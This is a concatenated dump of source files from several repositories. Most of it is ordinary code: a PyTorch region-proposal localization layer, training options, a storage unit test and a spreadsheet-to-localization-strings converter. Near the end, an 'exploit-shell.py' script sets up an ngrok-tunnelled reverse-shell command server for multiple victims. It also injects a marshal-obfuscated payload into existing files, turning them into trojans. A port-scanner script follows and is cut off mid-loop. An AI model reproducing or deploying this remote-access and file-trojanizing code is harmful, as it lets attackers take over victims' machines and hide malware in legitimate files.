self.opt.field_centers = utils.getopt(opt, 'field_centers')
self.opt.mid_box_reg_weight = utils.getopt(opt, 'mid_box_reg_weight')
self.opt.mid_objectness_weight = utils.getopt(opt, 'mid_objectness_weight')
self.opt.rpn_filter_size = utils.getopt(opt, 'rpn_filter_size', 3)
self.opt.rpn_num_filters = utils.getopt(opt, 'rpn_num_filters', 256)
self.opt.zero_box_conv = utils.getopt(opt, 'zero_box_conv', True)
self.opt.std = utils.getopt(opt, 'std', 0.01)
self.opt.anchor_scale = utils.getopt(opt, 'anchor_scale', 1.0)
self.opt.anchors = utils.getopt(opt, 'anchors', 'original')
self.opt.sampler_batch_size = utils.getopt(opt, 'sampler_batch_size', 256)
self.opt.sampler_high_thresh = utils.getopt(opt, 'sampler_high_thresh', 0.6)
self.opt.sampler_low_thresh = utils.getopt(opt, 'sampler_low_thresh', 0.3)
self.opt.train_remove_outbounds_boxes = utils.getopt(opt, 'train_remove_outbounds_boxes', 1)
self.opt.verbose = utils.getopt(opt, 'verbose')
self.opt.box_reg_decay = utils.getopt(opt, 'box_reg_decay', 5e-5)
self.opt.tunable_anchors = utils.getopt(opt, 'tunable_anchors', False)
self.opt.backprop_rpn_anchors = utils.getopt(opt, 'backprop_rpn_anchors', False)
self.stats = easydict.EasyDict()
self.dtp_train = utils.getopt(opt, 'dtp_train', False)
if self.dtp_train:
self.opt.sampler_batch_size //= 2
sampler_opt = {'batch_size': self.opt.sampler_batch_size,
'low_thresh': self.opt.sampler_low_thresh,
'high_thresh': self.opt.sampler_high_thresh}
self.rpn = RPN(self.opt)
self.box_sampler_helper = BoxSamplerHelper(sampler_opt, logger)
self.roi_pooling = BilinearRoiPooling(self.opt.output_size[0], self.opt.output_size[1])
self.invert_box_transform = InvertBoxTransform()
# Construct criterions
if self.opt.backprop_rpn_anchors:
self.box_reg_loss = BoxRegressionCriterion(self.opt.mid_box_reg_weight)
else:
self.box_reg_loss = nn.SmoothL1Loss() # for RPN box regression
self.box_scoring_loss = nn.CrossEntropyLoss()
self.image_height = None
self.image_width = None
self._called_forward_size = False
self._called_backward_size = False
def setImageSize(self, image_height, image_width):
self.image_height = image_height
self.image_width = image_width
self._called_forward_size = False
self._called_backward_size = False
def setTestArgs(self, args={}):
self.test_clip_boxes = utils.getopt(args, 'clip_boxes', True)
self.test_nms_thresh = utils.getopt(args, 'nms_thresh', 0.7)
self.test_max_proposals = utils.getopt(args, 'max_proposals', 300)
def init_weights(self):
self.rpn.init_weights()
def forward(self, input):
if self.training:
return self._forward_train(input)
else:
return self._forward_test(input)
def _forward_train(self, input):
cnn_features, gt_boxes = input[0], input[1]
# Make sure that setImageSize has been called
# different size for each image
assert self.image_height and self.image_width and not self._called_forward_size, \
'Must call setImageSize before each forward pass'
self._called_forward_size = True
N = cnn_features.size(0)
assert N == 1, 'Only minibatches with N = 1 are supported'
# B1 is the number of words in this page
assert gt_boxes.dim() == 3 and gt_boxes.size(0) == N and gt_boxes.size(2) == 4, \
'gt_boxes must have shape (N, B1, 4)'
# Run the RPN forward
# N x (D * k) x H x W-> N x (k * H * W) x D
# (boxes, anchors, trans, scores ,act_reg
# boxes: anchor boxes after regression in xc, yc, w, h, size are in original picture size!
# these four data are all in the last column
# anchors: original anchors
# trans: output from regression branch
# scores: output from score branch
rpn_out, act_reg = self.rpn.forward(cnn_features)
if self.opt.train_remove_outbounds_boxes == 1:
bounds = {'x_min': 0, 'y_min': 0, 'x_max': self.image_width, 'y_max': self.image_height}
self.box_sampler_helper.setBounds(bounds)
sampler_out = self.box_sampler_helper.forward((rpn_out, (gt_boxes,)))
# Unpack pos data
pos_data, pos_target_data, neg_data = sampler_out
# pos_trans, pos_scores are used for calculating loss
#
pos_boxes, pos_anchors, pos_trans, pos_scores = pos_data
# Unpack target data
pos_target_boxes = pos_target_data[0]
# Unpack neg data (only scores matter)
neg_boxes, neg_scores = neg_data
rpn_pos, num_neg = pos_boxes.size(0), neg_scores.size(0)
# Compute objectness loss
pos_labels = torch.ones(rpn_pos, dtype=torch.long)
neg_labels = torch.zeros(num_neg, dtype=torch.long)
if cnn_features.is_cuda:
pos_labels = pos_labels.cuda()
neg_labels = neg_labels.cuda()
obj_weight = self.opt.mid_objectness_weight
obj_loss_pos = obj_weight * self.box_scoring_loss(pos_scores, pos_labels)
obj_loss_neg = obj_weight * self.box_scoring_loss(neg_scores, neg_labels)
self.stats.obj_loss_pos = obj_loss_pos.detach()
self.stats.obj_loss_neg = obj_loss_neg.detach()
if self.opt.backprop_rpn_anchors:
reg_loss = self.box_reg_loss.forward((pos_anchors, pos_trans), pos_target_boxes)
else:
# Compute targets for RPN bounding box regression
# detach since no gradients needed for targets
# paramters needed to transform the boxes, [num_pos, 4]
pos_trans_targets = self.invert_box_transform.forward((pos_anchors, pos_target_boxes)).detach()
# DIRTY DIRTY HACK: To prevent the loss from blowing up, replace boxes
# with huge pos_trans_targets with ground-truth
max_trans = torch.abs(pos_trans_targets).max(1)[0]
max_trans_mask = torch.gt(max_trans, 100).view(-1, 1).expand_as(pos_trans_targets)
mask_sum = max_trans_mask.float().sum() / 4
# This will yield correct graph according to https://discuss.pytorch.org/t/how-to-use-condition-flow/644/5
if mask_sum.detach().item() > 0:
self.logger.warning('Masking out %d boxes in LocalizationLayer' % mask_sum.detach().item())
pos_trans[max_trans_mask] = 0
pos_trans_targets[max_trans_mask] = 0
# Compute RPN box regression loss
weight = self.opt.mid_box_reg_weight
reg_loss = weight * self.box_reg_loss.forward(pos_trans, pos_trans_targets)
self.stats.box_reg_loss = reg_loss.detach()
# Fish out the box regression loss
self.stats.box_decay_loss = act_reg.detach()
# Compute total loss
total_loss = obj_loss_pos + obj_loss_neg + reg_loss + act_reg
if self.dtp_train:
dtp_sampler_out = self.box_sampler_helper.forward(((input[2],), (gt_boxes,)))
dtp_pos_data, dtp_pos_target_data, dtp_neg_data = dtp_sampler_out
dtp_pos_boxes = dtp_pos_data[0]
dtp_pos_target_boxes = dtp_pos_target_data[0]
dtp_neg_boxes = dtp_neg_data[0]
pos_boxes = torch.cat((pos_boxes, dtp_pos_boxes), dim=0)
neg_boxes = torch.cat((neg_boxes, dtp_neg_boxes), dim=0)
pos_target_boxes = torch.cat((pos_target_boxes, dtp_pos_target_boxes), dim=0)
        # Concatenate pos_boxes and neg_boxes into roi_boxes
roi_boxes = torch.cat((pos_boxes, neg_boxes), dim=0)
# Run the RoI pooling forward for roi_boxes
self.roi_pooling.setImageSize(self.image_height, self.image_width)
roi_features = self.roi_pooling.forward((cnn_features[0], roi_boxes))
# roi_features are the cnn features after bilinear_pooling
output = (roi_features, roi_boxes, pos_target_boxes, total_loss)
if self.dtp_train:
output += (rpn_pos,)
return output
# Clamp parallel arrays only to valid boxes (not oob of the image)
# use in test!
def clamp_data(self, data, valid):
# data should be 1 x kHW x D
# valid is byte of shape kHW
assert data.size(0) == 1, 'must have 1 image per batch'
assert data.dim() == 3
mask = valid.view(1, -1, 1).expand_as(data)
return data[mask].view(1, -1, data.size(2))
def _forward_test(self, input):
cnn_features = input
arg = easydict.EasyDict({'clip_boxes': self.test_clip_boxes,
'nms_thresh': self.test_nms_thresh,
'max_proposals': self.test_max_proposals})
# Make sure that setImageSize has been called
assert self.image_height and self.image_width and not self._called_forward_size, \
'Must call setImageSize before each forward pass'
self._called_forward_size = True
rpn_out, act_reg = self.rpn.forward(cnn_features)
rpn_boxes, rpn_anchors, rpn_trans, rpn_scores = rpn_out
num_boxes = rpn_boxes.size(1)
del rpn_anchors
del rpn_trans
# Maybe clip boxes to image boundary
if arg.clip_boxes:
bounds = {'x_min': 1,
'y_min': 1,
'x_max': self.image_width,
'y_max': self.image_height}
rpn_boxes, valid = box_utils.clip_boxes(rpn_boxes, bounds, 'xcycwh')
# print(string.format('%d/%d boxes are predicted valid',
# torch.sum(valid), valid:nElement()))
# Clamp parallel arrays only to valid boxes (not oob of the image)
rpn_boxes = self.clamp_data(rpn_boxes, valid)
rpn_scores = self.clamp_data(rpn_scores, valid)
num_boxes = rpn_boxes.size(1)
# Convert rpn boxes from (xc, yc, w, h) format to (x1, y1, x2, y2)
rpn_boxes_x1y1x2y2 = box_utils.xcycwh_to_x1y1x2y2(rpn_boxes[0])
# Convert objectness positive / negative scores to probabilities
rpn_scores_exp = torch.exp(rpn_scores)
pos_exp = rpn_scores_exp[0, :, 0]
neg_exp = rpn_scores_exp[0, :, 1]
scores = (pos_exp + neg_exp).pow(-1) * pos_exp
if self.opt.verbose:
self.logger.info('in LocalizationLayer forward_test')
self.logger.info('Before NMS there are %d boxes' % num_boxes)
self.logger.info('Using NMS threshold %f' % arg.nms_thresh)
# Run NMS and sort by objectness score
boxes_scores = torch.cat((rpn_boxes_x1y1x2y2, scores.view(-1, 1)), dim=1)
if arg.max_proposals == -1:
idx = box_utils.nms(boxes_scores.detach(), arg.nms_thresh)
else:
idx = box_utils.nms(boxes_scores.detach(), arg.nms_thresh, arg.max_proposals)
rpn_boxes_nms = torch.squeeze(rpn_boxes)[idx]
if self.opt.verbose:
self.logger.info('After NMS there are %d boxes' % rpn_boxes_nms.size(0))
output = rpn_boxes_nms
return output
def eval_boxes(self, input):
"""
performs bilinear interpolation on the given boxes on the input features.
Useful for when using external proposals or ground truth boxes
Boxes should be in xc, yc, w, h format
"""
cnn_features, boxes = input
# Use roi pooling to get features for boxes
self.roi_pooling.setImageSize(self.image_height, self.image_width)
features = self.roi_pooling.forward((cnn_features[0], boxes))
return features
```
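One note on `_forward_test` above: the hand-rolled objectness conversion (`pos_exp / (pos_exp + neg_exp)`) is simply a two-way softmax, which a quick standalone check with dummy scores confirms:
```python
import torch
import torch.nn.functional as F

rpn_scores = torch.randn(1, 7, 2)                      # N x num_boxes x (pos, neg) logits
exp = torch.exp(rpn_scores)
manual = exp[0, :, 0] / (exp[0, :, 0] + exp[0, :, 1])  # the conversion used in _forward_test
softmaxed = F.softmax(rpn_scores[0], dim=1)[:, 0]
print(torch.allclose(manual, softmaxed))               # True
```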
#### File: rcnn/misc/reshape_box_features.py
```python
import torch
"""
Input a tensor of shape N x (D * k) x H x W
Reshape and permute to output a tensor of shape N x (k * H * W) x D
"""
class ReshapeBoxFeatures(torch.nn.Module):
def __init__(self, k):
super(ReshapeBoxFeatures, self).__init__()
self.k = k
def forward(self, input):
N, H, W = input.size(0), input.size(2), input.size(3)
D = input.size(1) // self.k
k = self.k
# [N,(D*k),H,W]->[N,k,H,W,D]
a = input.view(N, k, D, H, W).permute(0, 1, 3, 4, 2).contiguous()
output = a.view(N, k * H * W, D)
return output
```
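A quick shape check for the module above (hypothetical sizes, assuming the class is in scope):
```python
import torch

k, D, N, H, W = 3, 4, 1, 5, 6
layer = ReshapeBoxFeatures(k)
x = torch.randn(N, D * k, H, W)  # N x (D * k) x H x W
out = layer(x)                   # N x (k * H * W) x D
print(out.shape)                 # torch.Size([1, 90, 4])
```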
#### File: locator/rcnn/opts.py
```python
import argparse
import easydict
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-sampler_batch_size', default=256,
help='Batch size to use in the box sampler', type=int)
parser.add_argument('-num_pos', default=0, help='Number of positive examples', type=int)
parser.add_argument('-sampler_high_thresh', default=0.75,
help='Boxes IoU greater than this are considered positives', type=float)
parser.add_argument('-sampler_low_thresh', default=0.4,
help='Boxes with IoU less than this are considered negatives', type=float)
parser.add_argument('-train_remove_outbounds_boxes', default=1,
help='Whether to ignore out-of-bounds boxes for sampling at training time', type=int)
# Model
    parser.add_argument('-std', default=0.01, help='std for init', type=float)
parser.add_argument('-init_weights', default=1,
help='Whether to initialize weight for rpn and two final fc', type=int)
# Loss function
parser.add_argument('-mid_box_reg_weight', default=0.1, help='Weight for box regression in the RPN', type=float)
parser.add_argument('-mid_objectness_weight', default=0.5, help='Weight for box classification in the RPN',
type=float)
parser.add_argument('-end_box_reg_weight', default=0.1, help='Weight for box regression in the recognition network',
type=float)
parser.add_argument('-end_objectness_weight', default=0.5,
help='Weight for box classification in the recognition network', type=float)
parser.add_argument('-weight_decay', default=1e-5, help='L2 weight decay penalty strength', type=float)
parser.add_argument('-box_reg_decay', default=5e-5,
help='Strength of pull that boxes experience towards their anchor', type=float)
# Data input settings
    parser.add_argument('-image_size', default=1720, help='image size to use', type=int)
parser.add_argument('-dtp_train', default=1, help='Whether or not to use DTP in train', type=int)
# Optimization
parser.add_argument('-learning_rate', default=2e-4, help='learning rate to use', type=float)
parser.add_argument('-reduce_lr_every', default=12000, help='reduce learning rate every x iterations', type=int)
parser.add_argument('-beta1', default=0.9, help='beta1 for adam', type=float)
parser.add_argument('-beta2', default=0.999, help='beta2 for adam', type=float)
parser.add_argument('-epsilon', default=1e-8, help='epsilon for smoothing', type=float)
parser.add_argument('-max_iters', default=10000, help='Number of iterations to run; -1 to run forever', type=int)
parser.add_argument('-pretrained', action='store_true', help='Load model from a checkpoint instead of random initialization.')
parser.add_argument('-model_path', help='path to the pretrained model')
# Model checkpointing
parser.add_argument('-eval_every', default=200, help='How often to test on validation set', type=int)
# Test-time model options (for evaluation)
parser.add_argument('-test_rpn_nms_thresh', default=0.4,
help='Test-time NMS threshold to use in the RPN', type=float)
parser.add_argument('-max_proposals', default=-1,
help='Number of region proposal to use at test-time', type=int)
parser.add_argument('-score_nms_overlap', default=0.5,
help='NMS overlap using box scores in postprocessing', type=float)
parser.add_argument('-score_threshold', default=0.65,
help='score threshold using box scores in postprocessing', type=float)
parser.add_argument('-dtp_test', default=1, help='Whether or not to use DTP in test', type=int)
parser.add_argument('-test_batch_size', default=128, help='Whether or not to use DTP', type=int)
# Visualization
parser.add_argument('-print_every', default=10, help='How often to print the latest images training loss.',
type=int)
parser.add_argument('-out_path', default='out', help='output dir for intermediate results')
# Misc
parser.add_argument('-save_id', default='', help='an id identifying this run/job')
parser.add_argument('-quiet', default=0, help='run in quiet mode, no prints', type=int)
parser.add_argument('-verbose', default=0, help='print info in localization layer in test', type=int)
parser.add_argument('-gpu', default=1, help='use gpu or not.', type=int)
    parser.add_argument('-clip_final_boxes', default=1, help='Whether to clip final boxes to image boundary', type=int)
args = parser.parse_args()
return easydict.EasyDict(vars(args))
```
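A hedged usage sketch (assuming `easydict` is installed and the file above is importable as `opts`); none of the flags are required, so an empty argv falls back to the defaults:
```python
import sys
from opts import parse_args     # assumes the file above is saved as opts.py on the path

sys.argv = [sys.argv[0]]        # simulate running with no CLI flags
args = parse_args()
print(args.learning_rate)       # 0.0002
print(args.sampler_batch_size)  # 256
args.gpu = 0                    # EasyDict also allows attribute-style assignment
```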
#### File: locator/utils/util.py
```python
import os
def mkdir(dir_name):
if not os.path.isdir(dir_name):
try:
os.makedirs(dir_name)
except OSError:
print('Can not make directory for {}'.format(dir_name))
raise OSError
else:
print("Make directory for {}".format(dir_name))
else:
print("{} already exists".format(dir_name))
``` |
{
"source": "joker452/SimpleRaft",
"score": 3
} |
#### File: SimpleRaft/tests/test_surfstore.py
```python
import os
import unittest
from hashlib import sha256
from src.surfstore import SurfStore
class TestServerAlone(unittest.TestCase):
"""
Test server basic functionality without RPC and client
"""
def setUp(self) -> None:
self.server = SurfStore()
def test_get_set_blocks(self):
b = os.urandom(4096)
self.server.putblock(b)
self.assertEqual(b, self.server.getblock(sha256(b).digest()))
def test_info(self):
infos = self.server.getfileinfomap()
self.assertEqual(infos, {})
file_name = 'lala.txt'
infos = {file_name:
[1,
[sha256(os.urandom(4096)).digest(),
sha256(os.urandom(4096)).digest(),
sha256(os.urandom(4096)).digest()]]}
self.server.updatefile(file_name, infos[file_name][0], infos[file_name][1])
self.assertEqual(infos, self.server.getfileinfomap())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "Joker462/mobile-csv-localizer",
"score": 3
} |
#### File: mobile-csv-localizer/Resources/xlsx2strings.py
```python
import sys, argparse, logging, os, importlib
from openpyxl import load_workbook
# Python 3.8 and more
importlib.reload(sys)
PLATFORM = None
IN_PATH = None
OUT_PATH = None
LANG_KEYS = None # static will change later
# Gather our code in a main() function
def main(args, loglevel):
logging.basicConfig(format="%(message)s", level=loglevel)
PLATFORM = args.platform
IN_PATH = args.input
OUT_PATH = args.output
print('\n')
logging.info("Start Localizing .... ")
print('\n')
logging.info("------------------------------------")
# check source path
logging.debug("\n")
logging.debug("Validating source path ...")
logging.debug("\n")
if not os.path.exists(IN_PATH):
logging.error('Source path not found, Invalid path.')
logging.debug("\n")
return
logging.debug("Valid source path, finding csv file ...")
logging.debug("\n")
logging.debug("Validating target path ...")
logging.debug("\n")
# check output path
if not os.path.exists(OUT_PATH):
logging.error('Target path not found, Invalid path.')
logging.debug("\n")
return
logging.debug("Valid target path, generating output directory ...")
logging.debug("\n")
# generate output directory
OUTPUT_DIR = os.path.join(OUT_PATH, "Output/{0}".format(PLATFORM))
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
logging.debug("Output directory generated : %s" % OUTPUT_DIR)
logging.debug("\n")
else:
logging.debug("Using output directory: %s" % OUTPUT_DIR)
logging.debug("\n")
logging.debug("\n")
if PLATFORM == "ios":
logging.debug("Platform : %s" % PLATFORM)
elif PLATFORM == "android":
logging.debug("Platform : %s" % PLATFORM)
else:
        logging.warning("Invalid platform, platform should be ios or android.")
logging.debug("\n")
logging.error('ERROR LOCALIZING.\n')
return
logging.info("Generated output directory: %s" % OUTPUT_DIR)
generate_keys(IN_PATH, OUTPUT_DIR, PLATFORM)
print('\n')
logging.info("DONE LOCALIZING.\n")
def generate_keys(source_path, output, platform):
base_out_dir = output
full_out_paths = None
allwrites = None
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
# create language key
workbook = load_workbook(fullpath)
worksheet = workbook.active
first_row = worksheet[1]
line = []
for cell in first_row:
line.append(cell.value)
# remove the first element in first row cause this has value 'key'
LANG_KEYS = line[1:] # assign new value to key
# iterate each language
lang_path = ""
for lang in LANG_KEYS:
if platform == "ios":
lang_path = os.path.join(base_out_dir, "{0}.lproj/".format(lang))
if platform == "android":
lang_path = os.path.join(base_out_dir, "values-{0}/".format(lang))
# Generate directory per language key
if not os.path.exists(lang_path):
os.makedirs(lang_path)
if platform == "ios":
full_out_paths = [os.path.join(base_out_dir, "{0}.lproj/".format(langKey) + "Localizable.strings") for langKey in LANG_KEYS]
if platform == "android":
full_out_paths = [os.path.join(base_out_dir, "values-{0}/".format(langKey) + "strings.xml") for langKey in LANG_KEYS]
allwrites = [open(out_path, 'w') for out_path in full_out_paths]
if platform == "ios":
start_localize_ios(source_path, allwrites, LANG_KEYS)
if platform == "android":
start_localize_android(source_path, allwrites, LANG_KEYS)
# =========================================================================
# ++++++++++++++++++++++++ Check available ++++++++++++++++++++++++++++++++
# =========================================================================
def check_availability(element, collection):
return element in collection
def to_unicode_or_bust(obj, encoding='utf-8'):
    # Python 3: decode bytes to str; any other object passes through unchanged
    if isinstance(obj, bytes) and encoding:
        obj = obj.decode(encoding)
    return obj
# =========================================================================
# ++++++++++++++++++++++++++++++ iOS ++++++++++++++++++++++++++++++++++++++
# =========================================================================
def start_localize_ios(source_path, all_writes, lang_keys):
allwrites = all_writes
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
workbook = load_workbook(fullpath)
worksheet = workbook.active
# skip first line (it is header).
rows = worksheet.iter_rows(min_row=2)
# Header
[fwrite.write('/*\n Localizable.strings\n*/\n') for fwrite in allwrites]
my_key_list = ['']
for row in rows:
row_key = row[0].value
# comment
if row_key == '':
continue
elif row_key[:2] == '/*':
[fwrite.write('\n{key}\n'.format(key=row_key)) for fwrite in allwrites]
continue
# check contains
elif check_availability(row_key, my_key_list):
continue
my_key_list.append(row_key)
row_values = [row[i+1] for i in range(len(lang_keys))]
# if any row is empty, skip it!
if any([value.value == '' for value in row_values]):
[fwrite.write('\n') for idx, fwrite in enumerate(allwrites)]
else:
[fwrite.write('"{key}" = "{lang}";\n'.format(key=row_key, lang=row_values[idx].value)) for idx, fwrite in enumerate(allwrites)]
[fwrite.close() for fwrite in allwrites]
# =========================================================================
# ++++++++++++++++++++++++++++++ Android ++++++++++++++++++++++++++++++++++
# =========================================================================
def start_localize_android(source_path, all_writes, lang_keys):
allwrites = all_writes
[fwrite.write('<?xml version="1.0" encoding="utf-8"?>\n') for fwrite in allwrites]
[fwrite.write('<resources>') for fwrite in allwrites]
for dirname, dirnames, filenames in os.walk(source_path):
for f in filenames:
filename, ext = os.path.splitext(f)
if ext != '.xlsx':
continue
fullpath = os.path.join(dirname, f)
workbook = load_workbook(fullpath)
worksheet = workbook.active
# skip first line (it is header).
rows = worksheet.iter_rows(min_row=2)
# Header
[fwrite.write('\n<!--\n Localizable.strings\n-->\n') for fwrite in allwrites]
my_key_list = ['']
for row in rows:
row_key = row[0].value
if row_key == '':
continue
# comment
elif row_key[:2] == '/*':
[fwrite.write('\n<!-- {key} -->\n'.format(key=row_key.replace("/*", "").replace("*/", ""))) for fwrite in allwrites]
continue
# check contains
elif check_availability(row_key, my_key_list):
continue
my_key_list.append(row_key)
row_values = [row[i+1] for i in range(len(lang_keys))]
# if any row is empty, skip it!
if any([value.value == '' for value in row_values]):
[fwrite.write('\n') for idx, fwrite in enumerate(allwrites)]
else:
[fwrite.write('\t<string name="{key}">{lang}</string>\n'.format(key=row_key, lang=row_values[idx].value)) for idx, fwrite in enumerate(allwrites)]
[fwrite.close() for fwrite in allwrites]
# =========================================================================
# +++++++ Standard boilerplate to call the main() function to begin +++++++
# =========================================================================
parser = argparse.ArgumentParser(description="Localization commands")
parser.add_argument("-p", help="Specify Platform (iOS, Android)", dest="platform", type=str, required=True)
parser.add_argument("-i", help="Input source, CSV file path", dest="input", type=str, required=True)
parser.add_argument("-o", help="Generated output path for localizable files", dest="output", type=str, required=True)
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
# Setup logging
if args.verbose:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
main(args, loglevel)
``` |
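Since the script above parses `sys.argv` at import time, it is meant to be run as a command; a hypothetical invocation (all paths are placeholders) could look like:
```python
import subprocess

subprocess.run([
    "python3", "xlsx2strings.py",  # the file above
    "-p", "ios",                   # ios -> <lang>.lproj/Localizable.strings, android -> values-<lang>/strings.xml
    "-i", "./translations",        # directory walked for .xlsx sources
    "-o", "./build",               # Output/<platform>/ is generated beneath this path
    "-v",                          # verbose logging
], check=True)
```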
{
"source": "JOKER-7X/HackerMode",
"score": 2
} |
#### File: base/bin/exploit-shell.py
```python
exit("Permission Error: github.com bloked the tool")
import os
import sys
import cmd
import time
import socket
import tempfile
import requests
import threading
print_sys = print
from rich import print
from typing import Optional, Any, Tuple, List
TOOLS_PATH = os.path.join(__file__.rsplit('/', maxsplit=2)[0], 'tools/exploit-shell')
with open(os.path.join(TOOLS_PATH, 'payload.py')) as file:
PAYLOAD = file.read()
while ' ':
check_platform_name = os.popen('lsb_release -i').read().lower()
if 'ubuntu' in check_platform_name:
os.system(r'gnome-terminal -e "bash -c \"ngrok tcp 4444; exec bash\""')
time.sleep(1)
try:
req = requests.get('http://localhost:4040/api/tunnels').json()['tunnels'][0]
break
except requests.exceptions.ConnectionError:
input('\n# please open a tcp port on ngrok\n and click [Enter] ')
HEADER: int = 64
PAYLOAD_SERVER: str = req['public_url'].replace('tcp://', '').split(':')[0]
PAYLOAD_PORT: int = req['public_url'].split(':')[2]
SERVER, PORT = req['config']['addr'].split(':')
ADDR: Tuple[str, int] = (SERVER, int(PORT))
FORMAT: str = 'utf-8'
DISCONNECT_MESSAGE: str = "!DISCONNECT"
server: object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind(ADDR)
except OSError:
exit("# Address already in use")
clients = set()
clients_lock = threading.Lock()
class BaseShell(cmd.Cmd):
def __init__(self, *args, **kwargs):
sys.stdout.write("\r")
super(BaseShell, self).__init__(*args, **kwargs)
def cmdloop(self, conn, addr, intro: Optional[Any] = ...) -> None:
self.conn: object = conn
self.addr: int = addr
self.prompt = f"[{self.conn.getsockname()}]~$ "
super(BaseShell, self).cmdloop(intro=intro)
def default(self, line: str) -> ...:
self.send(self.conn, line)
data = self.read_str()
if data:
print_sys(data)
def emptyline(self):
"""Called when an empty line is entered in response to the prompt.
If this method is not overridden, it repeats the last nonempty
command entered.
"""
return None
def completenames(self, text: str, *ignored) -> List[str]:
packages: List[str] = super(
BaseShell, self
).completenames(text, *ignored)
packages += [
# add linux commands to shell
a for a in os.listdir(os.environ['SHELL'].rsplit('/', maxsplit=1)[0])
if a.startswith(text)
]
return list(set(packages))
def do_quit(self, arg: str) -> bool:
self.send(self.conn, DISCONNECT_MESSAGE)
self.conn.close()
self.cmdloop_status = False
print(f"# Server is listening on {socket.gethostbyname(PAYLOAD_SERVER)}")
return True
def do_clear(self, arg: str) -> ...:
os.system('clear')
def do_nano(self, arg: str):
self.send(
self.conn,
f"python3 -c \"data = 'x = open(\\'{arg}\\',\\'r\\');print (x.read());x.close()';exec('try:\\n \'+data+\'\\nexcept:pass')\""
)
with open(temp_file := os.path.join(tempfile.gettempdir(), arg), 'w') as file:
file.write(self.read_str())
os.system(f'nano {temp_file}')
with open(temp_file, 'r') as file:
self.send(self.conn, f'echo "{file.read()}" > {arg}')
def do_victims(self, arg: str) -> ...:
print(clients)
def do_session(self, arg: str) -> ...:
if arg.strip().isdigit() and int(arg) in range(0, len(clients)):
self.conn: object = list(clients)[int(arg)]
self.prompt = f"[{self.conn.getsockname()}]~$ "
else:
print('# [red]Session not found![/red]')
class ShellServer(BaseShell):
cmdloop_status: bool = False
def send(self, client, msg):
# to send commands to the client.
message: str = msg.encode(FORMAT)
msg_length: int = len(message)
send_length: bytes = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
try:
client.send(send_length)
client.send(message)
except BrokenPipeError:
print('# Session Status is [red]offline[/red]!')
def read_byets(self) -> bytes:
msg_length = self.conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
return self.conn.recv(msg_length)
return b''
def read_str(self) -> str:
msg_length = self.conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
return self.conn.recv(msg_length).decode(FORMAT)
return ''
def handle_client(self, conn, addr):
if not self.cmdloop_status:
print(f"# new connection...")
print_sys(f"# {addr} connected.\n")
self.cmdloop_status = True
self.cmdloop(conn, addr)
def create_payload(self):
def marshal(code):
import marshal as m
return f'import marshal as m\nexec(m.loads({m.dumps(compile(code,"<String>","exec"))}))'
if len(sys.argv) > 1:
file = sys.argv[1]
if os.path.isfile(file):
with open(file, 'r') as file_r:
content = file_r.read()
with open(file, 'w') as f:
_payload = PAYLOAD.format(injection=True, port=PAYLOAD_PORT, host=f'"{PAYLOAD_SERVER}"')
_payload = marshal(_payload)
if not _payload in content:
f.write(_payload+f'\n{content}')
else:
f.write(content)
else:
print(f"# file: {file} not found!")
exit(-1)
else:
with open('payload.py', 'w') as f:
f.write(marshal(PAYLOAD.format(injection=False, port=PAYLOAD_PORT, host=f'"{PAYLOAD_SERVER}"')))
def start(self):
server.listen()
print(f"# Server is listening on {socket.gethostbyname(PAYLOAD_SERVER)}")
while True:
conn, addr = server.accept()
with clients_lock:
clients.add(conn)
thread = threading.Thread(target=self.handle_client, args=(conn, addr))
thread.start()
if __name__ == '__main__':
Server = ShellServer()
try:
Server.create_payload()
Server.start()
except KeyboardInterrupt:
print("# Server [red]stoped[/red]!")
```
#### File: base/bin/scan.py
```python
from N4Tools.Design import Text,Square,ThreadAnimation,Animation,AnimationTools
import requests as req
import socket,os,time,sys
from threading import Thread as u
A = Animation()
class MA:
def CustomAnimation(min=0,max=5639,**kwargs):
yield A.Prograsse(min=min,max=max,prograsse=['│','\033[1;36m█','\033[1;34m▒','│'],text='Scanning',**kwargs)[0]+f'\033[1;37m({round(min*100/max,1)}/100.0) '
class Main(MA):
ips=[]
def __init__(self):
try:
self.Sq = Square()
self.Sq.color = '[$LCYAN]'
self.T = Text()
eip = req.get('https://api.ipify.org').text
self.ips.append(eip+'+eip')
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
iip = s.getsockname()[0]
self.ips.append(iip+'+iip')
self.open_ports1 = []
self.open_ports1.sort()
self.open_ports2 = []
self.open_ports2.sort()
self.ports=set(list(range(1,6535)) + [8080,7547,6666,8888,7777])
self.mw=os.get_terminal_size().columns
except socket.gaierror:
exit()
except socket.error:
print('\033[1;31m[-] Check your internet connection..!\033[0m')
exit()
except KeyboardInterrupt:
exit()
b='''
_____ _--_
/ ___/_________ _____ .' '.
\__ \/ ___/ __ `/ __ \ |\033[1;30m((0)) \033[1;35m|
___/ / /__/ /_/ / / / / | |
/____/\___/\__,_/_/ /_/ '. .'
|""|
'''
print('\033[0;32m',b,'\033[0m')
def serv(self,p):
try:
x=socket.getservbyport(p)
except socket.error:
x='Unknown'
return x
def display(self,i):
i,a=i.split('+')
myl=self.open_ports1 if a=='eip' else self.open_ports2
fu = '''
port Service Status
[$LCYAN]═══════════════════════════════'''
Ip = f'\n\n[$LYELLOW][{i}]'
if not len(myl):
            fu+='\n[$LRED] No Service Is Running\b'
else:
for p in myl:
fu+=f'\n[$LBLUE] {str(p).ljust(4)} {self.serv(p).rjust(8)} {"Open".rjust(7)} '
box_info=self.Sq.base(fu[1:-1])
output = self.T.CentreAlignPro([Ip,box_info])
for x in output.split('\n'):
print("\t"+x)
@ThreadAnimation(Animation=MA.CustomAnimation)
def scan(Thread,self):
p=0
for ip in self.ips:
i,a=ip.split('+')
myl=self.open_ports1 if a=='eip' else self.open_ports2
for port in self.ports:
